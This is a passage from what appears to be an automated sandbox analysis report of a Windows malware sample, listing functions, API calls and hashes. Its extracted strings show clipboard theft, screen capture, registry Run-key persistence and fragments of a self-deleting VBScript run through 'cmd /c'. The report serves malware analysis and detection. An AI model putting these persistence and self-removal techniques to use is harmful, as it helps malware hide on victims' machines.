                                                                                                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                                                                                Function 0040B749 Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                                                                                                • CloseClipboard.USER32 ref: 0040B760
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Clipboard$CloseDataOpen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2058664381-0
                                                                                                                                                • Opcode ID: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                                                                                                                • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                                                                                                                                • Opcode Fuzzy Hash: 26d649817908997ada01c7e81b47d9ed8d660a846a8981428adfc510ab3c4a2f
                                                                                                                                                • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                                                                                                                                Function 00434CB6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 134COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FeaturePresentProcessor
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2325560087-3916222277
                                                                                                                                                • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                                                                                                                                • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                                                                                                                                • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                                                                                                                                Function 0044896D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                • String ID: GetLocaleInfoEx
                                                                                                                                                • API String ID: 2299586839-2904428671
                                                                                                                                                • Opcode ID: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                                                                                                                • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                                                                                                                                • Opcode Fuzzy Hash: 110c46932bfbdc71483985bf7c59ae7b5a80d23a28ef7d8b7feaf75df53ed1b9
                                                                                                                                                • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                                                                                                                                Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                • Opcode ID: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                                                                                                                • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                                                                                                                                • Opcode Fuzzy Hash: 95356b50ae1c40d028bb7c10486cf6eec28d3cbd66e590edfc92b155960a397c
                                                                                                                                                • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                                                                                                                                Function 00452393 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                                                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1663032902-0
                                                                                                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                                                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                                                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                                                                                                Function 0045201B Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001), ref: 0045208D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1084509184-0
                                                                                                                                                • Opcode ID: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                                                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                                                                                                                • Opcode Fuzzy Hash: cd62537e8c3e003b13522b9155b4eea68fe7d0001d8d421cd242523031e004a2
                                                                                                                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                                                                                                                Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2692324296-0
                                                                                                                                                • Opcode ID: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                                                                                                • Opcode Fuzzy Hash: ed905f4e10f5b376defebc36d7d97aa2bb2c1abe5f1ea1ee61b46868c197e3f5
                                                                                                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                                                                                                Function 004520B6 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001), ref: 00452102
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1084509184-0
                                                                                                                                                • Opcode ID: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                                                                                • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                                                                                                                                • Opcode Fuzzy Hash: b47e8d7704c3cea33439bb1b9c4b2a0344765dc89a2caae7295f0002ba586764
                                                                                                                                                • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                                                                                                                                Function 0041B69E Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: NameUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                • Opcode ID: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                                                                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                                                                                • Opcode Fuzzy Hash: 6f8df8ca086827d3b7a07e2ceec29cc063485458526563a8914dedb1098b546b
                                                                                                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                                                                                Function 00448484 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(?,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                                                                                                • EnumSystemLocalesW.KERNEL32(Function_0004843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1272433827-0
                                                                                                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                                                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                                                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                                                                                                Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                                                                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                                                                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001), ref: 00452007
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1084509184-0
                                                                                                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                                                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                                                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                                                                                                Function 0040F90C Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: InfoLocale
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2299586839-0
                                                                                                                                                • Opcode ID: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                                                                                • Opcode Fuzzy Hash: 60ac6b383c0d02c34bbf412ad9b051435ec7f82dc161eda072fb95a07eb92a85
                                                                                                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                                                                                                Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                                Function 00418EB1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                                                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00418F8C
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418F9D
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00418FA0
                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418FC4
                                                                                                                                                • GetIconInfo.USER32(?,?), ref: 00418FF8
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00419027
                                                                                                                                                • DeleteObject.GDI32(?), ref: 00419034
                                                                                                                                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419041
                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 00419077
                                                                                                                                                • GetObjectA.GDI32(00000000,00000018,?), ref: 004190A3
                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00419110
                                                                                                                                                • GlobalAlloc.KERNEL32(00000000,?), ref: 0041917F
                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004191A3
                                                                                                                                                • DeleteDC.GDI32(?), ref: 004191B7
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004191BA
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004191BD
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 004191C8
                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0041927C
                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00419283
                                                                                                                                                • DeleteDC.GDI32(?), ref: 00419293
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 0041929E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIcon$BitmapBitsDisplayDrawEnumInfoLocalSelectSettingsStretch
                                                                                                                                                • String ID: DISPLAY
                                                                                                                                                • API String ID: 479521175-865373369
                                                                                                                                                • Opcode ID: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                                                                                                                • Instruction ID: e1b8f987aa81746083de8242de432fb1856ba331ec6d7e725e66c1191a76d441
                                                                                                                                                • Opcode Fuzzy Hash: a3a4741cb06b3bb280ebd52fb29a8cd3e9580c118e1ba6673d441af15fd395ed
                                                                                                                                                • Instruction Fuzzy Hash: 64C14C71504301AFD720DF25DC48BABBBE9EB88715F04482EF98993291DB34ED45CB6A
                                                                                                                                                Function 0040D45B Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D558
                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D56B
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D584
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D5B4
                                                                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                                                                                                  • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D7FF
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040D80B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                • String ID: """, 0$")$8SG$@qF$@qF$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                                • API String ID: 1861856835-1447701601
                                                                                                                                                • Opcode ID: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                                                                                                                • Instruction ID: 9f807323933333198641953f201c1fc8368d74e19fdabe041c5449f7db564f80
                                                                                                                                                • Opcode Fuzzy Hash: 794eba10b69094c6990f25edb43bc5f181c5c90267341265794d1b1851e37820
                                                                                                                                                • Instruction Fuzzy Hash: 8791B0716082005AC315FB62D8529AF77A8AFD4309F10443FB64AA71E3EF7C9D49C65E
                                                                                                                                                Function 0040D0D1 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                                                                                                  • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E0
                                                                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1F3
                                                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D223
                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D232
                                                                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2B8,00000000,00000000,?,0040D47D,?,00000000), ref: 0040B8F6
                                                                                                                                                  • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B902
                                                                                                                                                  • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(0040A2A2,00000000,?,0040D47D,?,00000000), ref: 0040B910
                                                                                                                                                  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                                • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                                                • API String ID: 3797177996-2483056239
                                                                                                                                                • Opcode ID: ec03f19f21437d373cc1d96c9dd98b1915d83cb06e604dc6ef52706e93ab3566
                                                                                                                                                • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
